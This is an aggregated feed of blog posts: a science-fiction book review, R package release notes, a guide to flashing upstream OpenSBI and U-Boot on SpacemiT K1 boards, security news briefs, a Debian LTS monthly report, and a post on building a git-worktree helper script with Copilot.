The Scythian colony is about four hundred people, now located in a desert climate since the complex native life forms destroyed their previous settlement. The colonists are a split between Ischnurans and Zandaheans, two other human civilizations from the scatter of colony worlds left after Earth embraced AIs (aiyis here) and turned inward. Both of those groups marry, something John considers a moral abomination. Neither of them seem likely to understand Essian sexual ethics. More devastatingly, John had intended to spend some time as a ship doctor and then return home to a new place in Essian society. Once he lands on Scythia, the chances of that are gone; it is highly unlikely any ship would pick him up again and take him home.

I have been trying to find the right books to compare What We Are Seeking with ever since I read it. The best I've come up with are Ursula K. Le Guin (particularly The Dispossessed), Eleanor Arnason's A Woman of the Iron People, and Becky Chambers's To Be Taught, If Fortunate. The start of the book felt like an intentional revisiting of an earlier era of science fiction, with somewhat updated science and politics, but the last half of the book, where the action picks up considerably, is a meditation on gender, social systems, religion, and small-group politics. All of that is mixed with biological exploration and a first-contact story with some quite-alien aliens.

This is the sort of novel where the protagonist's culture is as foreign to the reader as any of the other cultures he counters, so the reader is assembling several jigsaw puzzles at once. John is dropped into an established colony with its own social norms and established hierarchies. The one other outsider, the translator Sudharma Jain, is, as his name implies, a Jain who keeps very strict religious observances. Half of the colony is from something akin to a fundamentalist Christian religious sect that practices patriarchy and strict marriage codes. The other half is more gently sexist (but still sexist) and has its own tradition of a third gender that becomes central to the story. John, meanwhile, is a strong believer in the Essian approach to social organization: Any two partners of any gender freely have sex by mutual consent and without obligation, and family is based solely on blood relations. These beliefs do not fit comfortably together, even when people are trying (as they mostly do) to be welcoming.

The first half of this book is very slow. This gives all of the characters space to breathe and become comfortable, and the characterization is superb, but it is a book to start when you're in the mood for something slow and observational. There is a plot that gradually becomes apparent, or rather there are several plots that are intertwined, but tension and urgency are mostly reserved for the second half of the book. Instead, the book opens with a lot of close observation of alien flora and fauna and the untangling of subtle social dynamics among the Scythians.

There is also a visitor from earth, much to the distress of the Scythians. Earth presence means the ships will not return and the colony may be cut off from any sort of technological resupply. Despite speaking a common language, that visitor is as mutually alien to the other groups as they are to the native flora. Her life is fully integrated with aiyis, giving her essentially godlike powers and the ability to turn off inconvenient emotions and disregard anything she doesn't want to see. What she and the Earth aiyis are doing on the planet is one of the early mysteries.

The dialogue in this book is truly excellent. Each characters has their own voice, there are fascinating digressions on different words that lead to tidbits of world-building, and some of the culture-specific idioms are delightful.

"I'm making a mess of this. None of that matters. Let me fall out the window and come in the door again. This is how my story ought to start:"

The challenges for the characters in this story are slow but deep ones: belonging and self-definition, the conflict between cultural tradition and personal circumstance, and the sacrifices required to live with small groups in situations where civil war is viscerally attractive. It has one of the most comprehensive and fascinating treatments of transgender issues that I've read in science fiction. Its commentary on current politics is subtle and estranged in the way that science fiction does best, but still pointed and satisfying. And, well, there are passages like this that I absolutely adore:

"I wouldn't go that far. It could be they are right, the universe we see exists because a mind like ours created it — at least, a mind enough like ours that we can say it wants one thing and not another, and when it acts it does so with intent. That's as good an idea as any. But it is certainly not plausible that such a being believes that people everywhere should marry, or that men should never visit men, or no one should become a jess. Look at what they have created. The universe could have been nothing at all, or one atom of hydrogen floating in a void, or a diamond crystal infinite in all directions, if their mind cared for simplicity or tidiness. Instead we have stars and planets and black holes and nebulas. It could have all been cold and dead, but there is life. They could have made one species for each world, or just a few, which could have stayed the same forever, but instead we have millions and millions, all of which are changing every moment, varying among themselves and boiling off in all directions. Such a god is like an artist who fills up a library of sketchbooks with their drawings of strange creatures, and when every scrap of paper in the place is used up, goes back with a different color ink and scribbles over them again. They are obsessed with variation — they gorge themselves with it and never grow full. Do you really think a mind like that could want us all to live in the same way?"

I had one problem with this book, though, and for me it was a big one: There is no ending. Reed effectively builds tension, gets me caring about all of the characters, sets up several problems, starts down a path towards resolution, and then the book just... ends.

Long-time readers of my reviews will know that I'm a denouement fanatic. I want the scouring of the shire, I want the chapter set in the happily ever after, I want the catharsis of an ending. This made me so grumpy!

To be clear, this is not sequel bait (at least so far as I can tell). I can write a philosophical defense of the ending. The types of problems and lives that Reed set up don't have clear endings; this is, to some extent, the point. We muddle through, and then those who come after us muddle through some more, and the cumulative effect is called human civilization. And there is some denouement; Reed doesn't leave the reader at a cliffhanger or anything that egregious.

But still, I wanted the happy ending, even though that was unrealistic for the style of story this is, because I'm a happy ending reader. This is not an ending sort of book; it's the sort of book where I get a sinking feeling at the 95% mark because there aren't enough pages left for the number of remaining unresolved problems. I've gotten less annoyed in the days since I finished the book, and I can appreciate the thematic point made by how the book ends, but I still feel like it's worth an advance warning if you're a reader like I am.

I would be delighted by a sequel, but it didn't feel like that was the intent.

Apart from that, this was both excellent and rather unlike a lot of current science fiction. I think the closest comparison I can make among recent novels I've read is Sue Burke's Semiosis. What We Are Seeking has a similar sort of world-building, but I liked these characters so much more. It felt like a classic literary science fiction novel, but very much written in 2026. Highly recommended, just beware of the lack of closure.

Content notes: Sexism, homophobia, stomach illness, and some religious abuse.

Rating: 8 out of 10

,

Planet DebianDirk Eddelbuettel: RProtoBuf 0.4.27 on CRAN: Upstream Adjustment

A new maintenance release 0.4.27 of RProtoBuf arrived on CRAN today. RProtoBuf provides R with bindings for the Google Protocol Buffers (“ProtoBuf”) data encoding and serialization library used and released by Google, and deployed very widely in numerous projects as a language and operating-system agnostic protocol. The new release is also already as a binary via r2u.

This release adjusts to a change upstream. Luca Billi noticed that upstream removed some fields from FieldDescriptor, filed and issue and followed up with a spotless PR. No other changes.

The following section from the NEWS.Rd file has all details and links.

Changes in RProtoBuf version 0.4.27 (2026-04-26)

  • Adjust to FieldDescriptor API changes in ProtoBuf 3.4 (Luca Billi in #114 fixing #113)

Thanks to my CRANberries, there is a diff to the previous release. The RProtoBuf page has copies of the (older) package vignette, the ‘quick’ overview vignette, and the pre-print of our JSS paper. Questions, comments etc should go to the GitHub issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianAurelien Jarno: Running upstream OpenSBI on SpacemiT K1

The SpacemiT K1 is a rather interesting RISC-V SoC, found for instance on boards like the Banana Pi BPI-F3 board. It's one of those platforms that looked promising on paper, but took a bit of time before things really started to move upstream. Things have clearly accelerated over the last few months.

Linux 7.0 brings, among other things PCIe support, making the board quite capable as a development board. SD card, CPU thermal sensor and cpufreq support are already in the pipe.

Unfortunately the situation is less advanced on the firmware side. There is only very basic support for the SpacemiT K1 in U-Boot for the second stage, and initial SPL support has been posted on the mailing list, but has not yet been merged. In practice, this means you still have to rely on the vendor U-Boot, which is based on the rather old 2022.10 release.

On the other hand, OpenSBI does have upstream support for the SpacemiT K1, however it is not compatible with the vendor U-Boot, mostly due to device tree differences.

This can be addressed by applying a few patches to the vendor U-Boot, which I have published in a git tree in the k1-bl-v2.2.y-opensbi branch (technically this can also be handled on the OpenSBI side, but I prefer using a vanilla upstream OpenSBI version). The first two patches update the configuration to get closer to the upstream U-Boot defaults, and to enable some configuration options for the Milk-V Jupiter board, which stores its firmware in SPI NOR flash, instead of eMMC for the Banana Pi BPI-F3. The following patches update the device tree by adding extra compatible entries to several devices, as expected by the upstream kernel and OpenSBI (thanks to Troy Mitchell for the hint about the UART change) and update the CPU riscv,isa properties. Finally an additional patch adds the SpacemiT P1 PMIC to the device tree, which is required for the OpenSBI reboot patchset I recently posted (this is currently done only for the Banana Pi BPI-F3 and Milk-V Jupiter boards, but extending it to other boards should be straightforward).

Building this U-Boot version is as simple as running this command in the source directory:

make k1_defconfig && make

On a Banana Pi BPI-F3 board, the resulting U-Boot can be flashed with:

echo 0 > /sys/block/mmcblk0boot0/force_ro
dd if=FSBL.bin of=/dev/mmcblk0boot0 bs=512 seek=1
dd if=u-boot.itb of=/dev/mmcblk0p1

Building upstream OpenSBI is also fairly simple, and can be done by running this command in the source directory:

make PLATFORM=generic

On a Banana Pi BPI-F3 board, the resulting OpenSBI can be flashed with:

dd if=fw_dynamic.itb of=/dev/mmcblk0p2

Note that the vendor U-Boot version is patched to install OpenSBI in a separate partition instead of embedding, as the upstream U-Boot does. While this works well on the Banana Pi BPI-F3, the corresponding partition in the Milk-V Jupiter SPI NOR flash is too small for the upstream OpenSBI version, and can't be easily resized without breaking compatibility. To address this, the branch k1-bl-v2.2.y-opensbi-embedded contains an additional patch (a bit hackish I admit) to somehow restore the upstream approach. The build process remains simple, first build OpenSBI with the following command:

make PLATFORM=generic

Then build U-Boot, specifying the patch to the just built OpenSBI firmware:

make k1_defconfig && make OPENSBI=/path/to/opensbi/build/platform/generic/firmware/fw_dynamic.bin

On a Milk-V Jupiter board, the resulting combined U-Boot/OpenSBI can be flashed with:

modprobe mdtblock
dd bs=4k if=FSBL.bin of=/dev/mtdblock2
dd bs=4k if=u-boot.itb of=/dev/mtdblock5

This combined U-Boot/OpenSBI can also be used on a Banana Pi BPI-F3, using the same flashing procedure as above, while skipping the OpenSBI part (although running it won't cause any issue, it will simply be unused).

All of this is admittedly a bit hackish, but enabling the use of upstream OpenSBI is already one step forward. Hopefully, in a few months, we will be able to rely entirely on upstream U-Boot.

365 TomorrowsThe Crow That Teases My Dog

Author: David C.Nutt The Crow sat on the post croaking, clicking and cawing at my dog Culley. Culley’s got a real strong prey drive so watching him sit there and occasionally whine and stutter step was par for the course. Jah, Culley-boy has serious focus. If he scents a squirrel or chases a rabbit in […]

The post The Crow That Teases My Dog appeared first on 365tomorrows.

,

Rondam RamblingsSeeking God in Science part 6: Systems and States

In the previous two installments we talked about chairs, specifically, what distinguishes a chair from a non-chair.  We considered and rejected the "chairness hypothesis" in favor of the atomic theory, which says that chairs — and all physical objects (at least inanimate ones) — are made of atoms.  (N.B. I am actually a human, notwithstanding my fondness for em-dashes.)  What makes

365 TomorrowsTranquility > DENIED

Author: James Gonda The walls in the room curve inward like the inside of a shell, smooth and pale. When he thinks of sitting a chair rises from the floor and shapes itself to his back. Light fills the space evenly. His thoughts arrange themselves without effort. He feels panic build and begins counting breaths […]

The post Tranquility > DENIED appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: The Genocidal Healer

Review: The Genocidal Healer, by James White

Series: Sector General #8
Publisher: Orb
Copyright: 1991
Printing: May 2003
ISBN: 0-7653-0663-8
Format: Trade paperback
Pages: 255

The Genocidal Healer is the eighth book in James White's medical science fiction series about the Sector General hospital. As with the rest of the series, detailed memory of the previous books is not required and the books could be read out of order if you didn't mind spoilers.

I read this as part of the Orb General Practice omnibus.

Surgeon-Captain Lioren is a Tarlan doctor who was in charge of the medical response to a newly-discovered civilization. The aliens were suffering from an apparently universal plague and an ongoing vicious war waged entirely through hand-to-hand combat, putting them on the edge of extinction. Lioren rushed the distribution of a possible cure against the advice of the doctors working on developing it, with catastrophic results. As The Genocidal Healer opens, Lioren is insisting on a court-martial in the hope of receiving the sentence it believes it deserves and was denied: death.

(It pronouns are the convention in the Sector General series for all alien races and formal discussions, because even someone prone to bouts of gender essentialism such as White understood the need for avoiding gender assumptions in a science fiction medical context.)

Predictably, both Sector General and the Monitor Corps that technically runs the hospital are flatly unwilling to execute Lioren. Instead, he is assigned as a new apprentice in the psychology department under the legendary O'Mara, where he is ordered to investigate the psychological fitness of a senior doctor named Seldal. This leads him to talk to Seldal's patients, which in turn leads to a challenging set of ethical dilemmas.

The first five chapters (and more than sixty pages) are the story of Lioren's trial and a recounting of the events on Cromsag. The series is full of medical and cultural puzzles like this, and usually I like them, but I thought this one was less successful. We know the vague (and horrible) outline of the ending in advance, and the massive simplification and artificial universality that is required to make this puzzle work is particularly blatant. A universally infectious disease is more of a fiction plot than a believable biological concept, and the number of failures of communication, analysis, and misunderstanding that have to line up to create White's predetermined outcome were a bit much for me.

Once the story gets past that and into Lioren's psychological work, the novel improves. Lioren is guilt-ridden and irrational, but also rather arrogant about his guilt and his concepts of professional responsibility in a way that I think mostly worked. Most of the novel consists of Lioren slowly discovering that people like him and enjoy talking to him, much to his bafflement. In that, it has the gentle kindness and sense of universal basic decency that is characteristic of this series. There are, of course, medical puzzles to solve, although this time they are primarily psychological in nature. Various characters from previous books make an appearance, but White re-explains their background in sufficient detail that you don't need to remember (or have read) those previous books.

There are a lot of similarities between this book and the previous one, Code Blue—Emergency. Both feature nonhuman viewpoint protagonists and amusing descriptions of human facial expressions from an alien perspective. Both feature protagonists with overly rigid ethical structures that partly clash with the generally human policies of Sector General. The Genocidal Healer is a bit more subtle and nuanced, although a lot of Lioren's psychological evaluation rests on an ethical difference that I found somewhat unbelievable. This book, though, tackles a subject the previous book did not: religion. The treatment isn't horrible, but I have some complaints.

My primary issue is that Lioren, who starts as an atheist, does extensive research into religion to help a patient and then starts making statements summarizing the religions beliefs of the majority of known species that are just... Christianity. As someone raised Christian, I recognized it immediately as the sort of abstracted Christianity that Christians claim is universal while completely ignoring the opinions of the adherents of any other religion.

Key components of this majority galactic religious pattern, according to Lioren, include an omnipotent and omnibenevolent creator god, a religious figure who preaches forgiveness and mercy and is persecuted, and emphasis on redemption. This simply is not some abstract universal religion. This is just Christianity in disguise. Even in religions that have some of those elements in their traditions, they do not get the same emphasis and are not handled the way that Lioren describes them. I therefore found Lioren's extended discussions of religion rather annoying, since he kept claiming as relatively universal principles beliefs that are not even held by the majority of religious adherents on Earth, let alone a wildly varying collection of alien races with entirely different biology and societal constructions. It caused a lot of problems for my suspension of disbelief, on top of the annoyance at this repetition of, frankly, Christian propaganda.

Lioren goes, from that research, into theodicy (the problem of evil). The interesting part of this is White's earnest portrayal of a doctor's approach to societal problems: a desire to find workarounds and patches and fixes for anything that makes people unhappy, whether medical or social. It makes sense, given the horrible biologic hands that some of the aliens in this series have been dealt, that they would question the idea of a benevolent god, so this philosophical digression is justified in that sense. But you might guess that a mid-list science fiction author is not going to say something new about one of the oldest problems in Christianity, and indeed he does not. Lioren arrives at the standard handwaving about the unknowability of divine intent, which I found tedious to read but at least not fatal to the plot.

White, thankfully, doesn't take the religious material too far. The characters recognize how sensitive of an issue religion is in a hospital, Lioren never adopts religion fully, and the resolution of the plot is as much biological as philosophical. White is going somewhere with the introduction of religion, and although some of the path there annoyed me, I think the destination worked. White was from Northern Ireland, and therefore well aware of the drawbacks of religion, and he abhorred violence (hence Sector General as a setting), so the reader is in better hands with him than with most authors who might attempt this plot.

I think I know a bit too much about religion to be the best audience for this entry in the series, and I'm not sure the introductory five chapters quite worked. But as with all of the other books in the series, this kept me turning the pages and I'm glad I read it. The Genocidal Healer probably isn't worth seeking out unless you're reading the whole series, but if you're enjoying the rest of the series, you'll probably like this too.

Followed by The Galactic Gourmet.

Rating: 6 out of 10

,

Cryptogram Friday Squid Blogging: How Squid Survived Extinction Events

Science news:

Scientists have finally cracked a long-standing mystery about squid and cuttlefish evolution by analyzing newly sequenced genomes alongside global datasets. The research reveals that these bizarre, intelligent creatures likely originated deep in the ocean over 100 million years ago, surviving mass extinction events by retreating into oxygen-rich deep-sea refuges. For millions of years, their evolution barely changed—until a dramatic post-extinction boom sparked rapid diversification as they moved into new shallow-water habitats.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Cryptogram FBI Extracts Deleted Signal Messages from iPhone Notification Database

404 Media reports (alternate site):

The FBI was able to forensically extract copies of incoming Signal messages from a defendant’s iPhone, even after the app was deleted, because copies of the content were saved in the device’s push notification database….

The news shows how forensic extraction—­when someone has physical access to a device and is able to run specialized software on it—­can yield sensitive data derived from secure messaging apps in unexpected places. Signal already has a setting that blocks message content from displaying in push notifications; the case highlights why such a feature might be important for some users to turn on.

“We learned that specifically on iPhones, if one’s settings in the Signal app allow for message notifications and previews to show up on the lock screen, [then] the iPhone will internally store those notifications/message previews in the internal memory of the device,” a supporter of the defendants who was taking notes during the trial told 404 Media.

EDITED TO ADD (4/24): Apple has patched this vulnerability.

Cryptogram Hiding Bluetooth Trackers in Mail

It was used to track a Dutch naval ship:

Dutch journalist Just Vervaart, working for regional media network Omroep Gelderland, followed the directions posted on the Dutch government website and mailed a postcard with a hidden tracker inside. Because of this, they were able to track the ship for about a day, watching it sail from Heraklion, Crete, before it turned towards Cyprus. While it only showed the location of that one vessel, knowing that it was part of a carrier strike group sailing in the Mediterranean could potentially put the entire fleet at risk.

[…]

Navy officials reported that the tracker was discovered within 24 hours of the ship’s arrival, during mail sorting, and was eventually disabled. Because of this incident, the Dutch authorities now ban electronic greeting cards, which, unlike packages, weren’t x-rayed before being brought on the ship.

365 TomorrowsFieldwork

Author: Eva C. Stein Kaela had misread the trail map. She expected thorns and sunbaked clay; instead she stepped from the composite walkway into a grove. She wore a field harness of sterilised vials and a hand lens that layered spectral readouts over her vision. She was thinking about leaf venation – dicot xylem bundles […]

The post Fieldwork appeared first on 365tomorrows.

Worse Than FailureError'd: April Showers

"RFC 1738 (and 3986) disagree" and so does Daniel D. "Reddit API has some weird app creation going on with lots of recently migrated and undocumented stuff. But having redirect URL set to localhost (or 127.0.0.1) usually works. Well, if you don't disagree with Sir Tim Berners-Lee about what URL is. Which Reddit does. hostnumber = digits "." digits "." digits "." digits". I'd file this one with all the websites that try to perform validation on email addresses, and get it wrong.

ad5bfafde9a74b7a8c38d429a364be48

"Why aren't we getting any resumes?" wondered Fred G. "This is a snippet from a job posting. I'm sure it worked perfectly when HR tested it."

2c21d5766e724b9095103c6c537adfa3

"Service required..." was Chris H.'s title for this gem. "My 2022 Chevrolet has been at the dealer for recall service for two weeks now, "waiting for parts". That doesn't stop GM from emailing every few days with a reminder that the car needs the recall service, and inviting me to schedule it at a dealer (that isn't actually a dealer) located a convenient 2500 mile drive from my home (about 200 times the distance to the dealer where the car currently sits), and providing a non-existent placeholder phone number to contact them at to schedule the recall service."

78cac2590ecf4996a2f4ee79e0b38b49

"How to subtly tell your customers that you don't wish to be contacted" explains Yuri. "The bank's staff must be wondering why no one wants to talk to them...Is it their suit's brand that is throwing everyone off? Can they blame it on COVID?"

81b84743c3a9405f8ed25c9c18b86029

"Bad money formatting by tax software" Adam R. complained. "I'm ashamed to admit it, but yes, I did pay Intuit money to file my taxes. This should really be a free service provided by the government, but, y'know, *lobbying*. You'd think that a business focused on tax preparation software would know how to properly format currency values, but in this case they failed to set the proper number of decimal points."

a9085ecfb2d2403ebd3d856e0c2a1179

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Planet DebianFreexian Collaborators: Monthly report about Debian Long Term Support, March 2026 (by Santiago Ruano Rincón)

The Debian LTS Team, funded by [Freexian’s Debian LTS offering] (https://www.freexian.com/lts/debian/), is pleased to report its activities for March.

Activity summary

During the month of March, 20 contributors have been paid to work on Debian LTS (links to individual contributor reports are located below).

The team released 24 DLAs fixing 250 CVEs.

We also welcomed two new members: Lukas Märdian and Emmanuel Arias to the team, who actually started to contribute to the LTS project several months ago.

The team continued preparing security updates in its usual rhythm. Beyond the updates targeting Debian 11 (“bullseye”), which is the current release under LTS, the team also proposed updates for more recent releases (Debian 12 (“bookworm”) and Debian 13 (“trixie”)), including Debian unstable. We highlight several notable security updates here below.

  • ansible (DLA 4502-1), prepared by Lee Garret in collaboration with Jochen, fixing a vulnerability that allows attackers to bypass unsafe content protections
  • asterisk (DLA 4515-1), prepared by Lukas Märdian, fixing four CVEs that include possible privilege escalations.
  • gimp (DLA 4500-1), prepared by Thorsten, fixing four CVEs related to denial of service or execution of arbitrary code.
  • gst-plugins-base1.0 and gst-plugins-ugly1.0 (DLA-4514-1, DLA-4516-1, respectively), both prepared by Utkarsh, addressing vulnerabilities that may yield to arbitrary code execution.
  • imagemagick, released by Bastien Roucariès (DLA 4497-1) fixing multiple vulnerabilities that could lead to information leaks, bypass of security policies, denial of service or arbitrary code execution.
  • libpng1.6 (DLA 4521-1), prepared by Tobias Frost, fixing an arbitrary code execution vulnerability
  • linux: Ben Hutchings released DLA 4498-1 and DLA 4499-1 for linux 5.10 and linux 6.1, respectively. Those updates especially address the “CrackArmor” flaw.
  • ruby-rack (DLA 4505-1), prepared by Utkarsh Gupta, addressing two vulnerabilities
  • strongswan (DLA 4512-1), prepared by Thorsten Alteholz, fixing a Denial of Service vulnerability
  • roundcube (DLA 4517-1) prepared by Guilhem Moulin, who discovered that one of the fixes provided by upstream was incomplete.

Contributions from outside the LTS Team:

As usual, the thunderbird update, released as DLA 4511-1, was prepared by its maintainer Christoph Goehre. Thanks a lot for his continuous contributions.

The LTS Team has also contributed with updates to the latest Debian releases:

  • Andreas Henriksson completed the uploads of glib2.0 for both trixie and bookworm
  • Arnaud Rebillout: python-cryptography for trixie
  • Arnaud and Bastien worked together to prepare a ca-certificates-java release for unstable
  • Bastien completed the upload of gpsd for trixie that was proposed in January.
  • Bastien uploaded a regression update of apache2 for trixie
  • Bastien prepared a zabbix point update for trixie
  • Bastien in collaboration with Markus released netty updates for trixie and bookworm DSA 6160-1
  • Daniel Leidert proposed python-tornado releases for both trixie and bookworm.
  • Daniel also prepared a python-authlib update for trixie
  • Guilhem prepared a mapserver update for bookworm.
  • Lucas Kanashiro proposed merge requests to fix three CVEs in erlang for both trixie and bookworm
  • Sylvain Beucler continued the work to replace p7zip with 7zip in the different supported releases, and proposed a point update for bookworm
  • Tobias prepared trixie and bookworm security updates, released as DSA-6189-1
  • Utkarsh prepared trixie and bookworm security update for ruby-rack, released as DSA-6180-1

Individual Debian LTS contributor reports

Thanks to our sponsors

Sponsors that joined recently are in bold.

,

Planet DebianDirk Eddelbuettel: dtts 0.1.4 on CRAN: Maintenance

Leonardo and I are happy to announce another maintenance release 0.1.4 of our dtts package which has been on CRAN for four years now. dtts builds upon our nanotime package as well as the beloved data.table to bring high-performance and high-resolution indexing at the nanosecond level to data frames. dtts aims to offers the time-series indexing versatility of xts (and zoo) to the immense power of data.table while supporting highest nanosecond resolution.

This release, not unlike yesterday’s release of nanotime, is driven by recent changes in the bit64 package which underlies it. Michael, who now maintains it, had sent in two PRs to prepare for these changes. I updated continuous integration, and switched to Authors@R, and that pretty much is the release. The short list of changes follows.

Changes in version 0.1.4 (2026-04-23)

  • Continuous integration has received some routine updates

  • Adapt align() column names with changes in 'data.table' (Michael Chirico in #20)

  • Narrow imports to functions used for packages 'bit64', 'data.table' and 'nanotime' (Michael Chirico in #21)

Courtesy of my CRANberries, there is also a [diffstat repor]tbsdiffstat for this release. Questions, comments, issue tickets can be brought to the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianSergio Talens-Oliag: Developing a Git Worktree Helper with Copilot

Over the past few weeks I’ve been developing and using a personal command-line tool called gwt (Git Worktree) to manage Git repositories using worktrees. This article explains what the tool does, how it evolved, and how I used GitHub Copilot CLI to develop it (in fact the idea of building the script was also to test the tool).

The Problem: Managing Multiple Branches

I was working on a project with multiple active branches, including orphans; the regular branches are for fixes or features, while the orphans are used to keep copies of remote documents or store processed versions of those documents.

The project also uses a special orphan branch that contains the scripts and the CI/CD configuration to store and process the external documents (it is on a separate branch to avoid mixing its operation with the main project code).

The plan is trigger a pipeline against the special branch from remote projects to create or update the doc branch for it in our git repository, retrieving artifacts from the remote projects to get the files and put them on an orphan branch (initially I added new commits after each update, but I changed the system to use force pushes and keep only one commit, as the history is not really needed).

The original documents have to be changed, so, after ingesting them, we run a script that modifies them and adds or updates another branch with the processed version; the contents of that branch are used by the main branch build process (there we use git fetch and git archive to retrieve its contents).

When working on the scripts to manage the orphan branches I discovered the worktree feature of git, a functionality that allows me to keep multiple branches checked out in parallel using a single .git folder, removing the need to use git switch and git stash when changing between branches (until now I’ve been a heavy user of those commands).

Reading about it I found that a lot of people use worktrees with the help of a wrapper script to simplify the management. After looking at one or two posts and the related scripts I decided to create my own using a specific directory structure to simplify things.

That’s how I started to work on the gwt script; as I also wanted to test copilot I decided to build it using its help (I have a pro license at work and wanted to play with the cli version instead of integrated into an editor, as I didn’t want to learn a lot of new keyboard shortcuts).

The gwt Philosophy: Opinionated and Transparent

gwt enforces a simple, filesystem-visible model:

  • Exactly one bare repository named bare.git (treated as an implementation detail)
  • One worktree directory per branch where the directory name matches the branch name
  • Single responsibility: gwt doesn’t try to be a general git wrapper; it only handles operations that map cleanly to this layout

The repository structure looks like this:

my-repo/
+-- bare.git/           # the Git repository (internal)
+-- main/               # worktree for branch "main"
+-- feature/api/        # worktree for branch "feature/api"
+-- fix/docs/           # worktree for branch "fix/docs"
+-- orphan-history/     # worktree for the "orphan-history" branch

The tool follows five core design principles:

  1. Explicit over clever: Git commands are not hidden or reinterpreted
  2. Transparent execution: Every operation is printed before it happens
  3. Safe, preview-first operations: Destructive commands default to preview, confirmation, then apply
  4. Shell-agnostic core: The script never changes the caller’s working directory (shell wrappers handle that)
  5. Opinionated but minimal: Only commands that fit the layout model are included

Core Commands

The script provides these essential commands:

  • gwt init <url> — Clone a repository and set up the gwt layout
  • gwt convert <dir> — Convert an existing Git checkout to the gwt layout
  • gwt add [--orphan] <branch> [<base>] — Create a new worktree (optionally orphaned)
  • gwt remove <branch> — Remove a worktree and unregister it (asks the user to remove the local branch too, useful when removing already merged branches)
  • gwt rename <old> <new> — Rename a branch AND its worktree directory
  • gwt list — List all worktrees
  • gwt default [<branch>] — Get or set the default branch
  • gwt current — Print the current worktree or branch name

Except init and convert all of the commands work inside a directory structure that follows the gwt layout, which looks for the bare.git folder to find the root folder of the structure.

As I don’t want to hide which commands are really used by the wrapper, all git and filesystem operations pass through a single run shell function that prints each command before executing it. This gives complete visibility into what the tool is doing.

Also, destructive operations (remove, rename) default to preview mode:

$ gwt remove feature-old --dry-run

+ git -C bare.git branch -d feature-old
+ git -C bare.git worktree remove feature-old/

Apply these changes? [y/N]:

The user sees exactly what will happen, can verify it’s correct, and only then confirm execution.

Incremental Development with Copilot

The gwt script has grown from 597 lines in its original version (git-wt) to 1,111 lines when writing the first draft of this post.

This growth happened through incremental, test-driven development, with each feature being refined based on real usage patterns.

What follows is a little history of the script evolution written with the help of git log.

Initial version

First I wrote a design document and asked copilot to create the initial version of the git-wt script with the original core commands.

I started to use the tool with a remote repostory (I made copies of the branches in some cases to avoid missing work) and fixed bugs (trivial ones with neovim, larger ones asking copilot to fix the issues for me, so I had less typing to do).

First command update

One of the first commands I had to enhance was rename:

  • as I normally use branches with / on their name and my tool checks out the worktrees using the branch name as the path inside the gwt root folder (i.e. a fix/rename branch creates the fix directory and checks the branch inside the fix/rename folder) the rename command had to clean up the empty parent directories
  • when renaming a worktree we move the folders and fix the references using the worktree repair command to make things work locally, but the rename also affects the remote branch reference, to avoid surprises the command unsets the remote branch reference so it can be pushed again using the new name (of course, the user is responsible of managing the old remote branch, as the gwt can’t guess what it should do with it).

Integration with the shell

As I use zsh with the Powerlevel10k theme I asked copilot to help me add visual elements to the prompt when working with gwt folders, something that I would have never tried without help, as it would have required a lot of digging on my part on how to do it, as I never looked into it.

The initial version of the code was on an independent file that I sourced from my .zshrc file and it prints on the right part of the prompt when we are inside a gwt folder (note that if the folder is a worktree we see the existing git integration text right before it, so we have the previous behavior and we see that it is a gwt friendly repo) and if we are on the root folder or the bare.git folder we see gwt or bare (I added the text because there are no git promts on those folders).

I also asked copilot to create zsh autocompletion functions (I only use zsh, so I didn’t add autocompletion for other shells). The good thing here is that I wouldn’t have done that manually, as it would have required some reading to get it right, but the output of copilot worked and I can update things using it or manually if I need to.

One thing I was missing from the script was the possibility of changing the working directory easily, so I wrote a gwt wrapper function for zsh that intercepts commands that require shell cooperation (changing the working directory) and delegates everything else to the core script.

Currently the function supports the following enhanced commands:

  • cd [<branch>]: change into a worktree or the default one if missing
  • convert <dir>: convert a checkout, then cd into the initial worktree
  • add [--orphan] <branch> [<base>]: create a worktree, then cd into it on success
  • rename <old> <new>: rename a worktree, then cd into it if we were inside it

Note that the cd command will not work on other shells or if the user does not load my wrapper, but the rest will still work without the working directory changes.

Renaming the command

As I felt that git-wt was a long name I renamed the tool to gwt, I could have done it by hand, but using copilot I didn’t have to review all files by myself and it did it right (note that I have it configured to always ask me before doing changes, as it sometimes tries to do something I don’t want and I like to check its changes …​ as I have the files in git repos, I manually add the files when I like the status and if the cli output is not clear I allow it to apply it and check the effects with git diff so I can validate or revert what was done).

The convert command

After playing with one repo I added the convert subcommand for migrating existing checkouts, it seemed a simple task at first, but it took multiple iterations to get it right, as I found multiple issues while testing (in fact I did copies of the existing checkouts to be able to re-test each update, as some of the iterations broke them).

The version of the function when this post was first edited had the following comment explaining what it does:

# ---------------------------------------------------------------------------
# convert - convert an existing checkout into the gwt layout
# ---------------------------------------------------------------------------
#
# Must be run from the parent directory of <dir>.
#
# Steps:
#   1. Read branch from the checkout's HEAD
#   2. Rename <dir> to <dir>.wt.tmp (sibling, same filesystem)
#   3. Create <dir>/ as the new gwt root
#   4. Move <dir>.wt.tmp/.git to <dir>/bare.git; set core.bare = true
#   5. Fix fetch refspec (bare clone default maps refs directly, no remotes/)
#   6. Add a --no-checkout worktree so git wires up the metadata and
#      creates <dir>/<branch>/.git (the only file in that dir)
#   7. Move that .git file into the real working tree (<dir>.wt.tmp)
#   8. Remove the now-empty placeholder directory
#   9. Move the real working tree into place as <dir>/<branch>
#  10. Reset the index to HEAD so git status is clean
#      (--no-checkout leaves the index empty)
#  11. Create <dir>/.git -> bare.git symlink so plain git commands work
#      from the root without --git-dir
#
# The .git file ends up at the same absolute path git recorded in step 5,
# so no worktree repair is needed. Working tree files are never modified.

The .git link was added when I noticed that I could run commands that don’t need the checked out files on the root of the gwt structure, which is handy sometimes (i.e. a git fetch or a git log, that shows the log of the branch marked as default).

After playing with commands that used the bare.git folder I updated the init and convert commands to keep the origin refs, ensuring that the remote tracking works correctly.

Improving the add command

While playing with the tool on more repos I noticed that I also had to enhance the add command to better handle worktree creation, depending on my needs.

Right now the tool supports the following use cases:

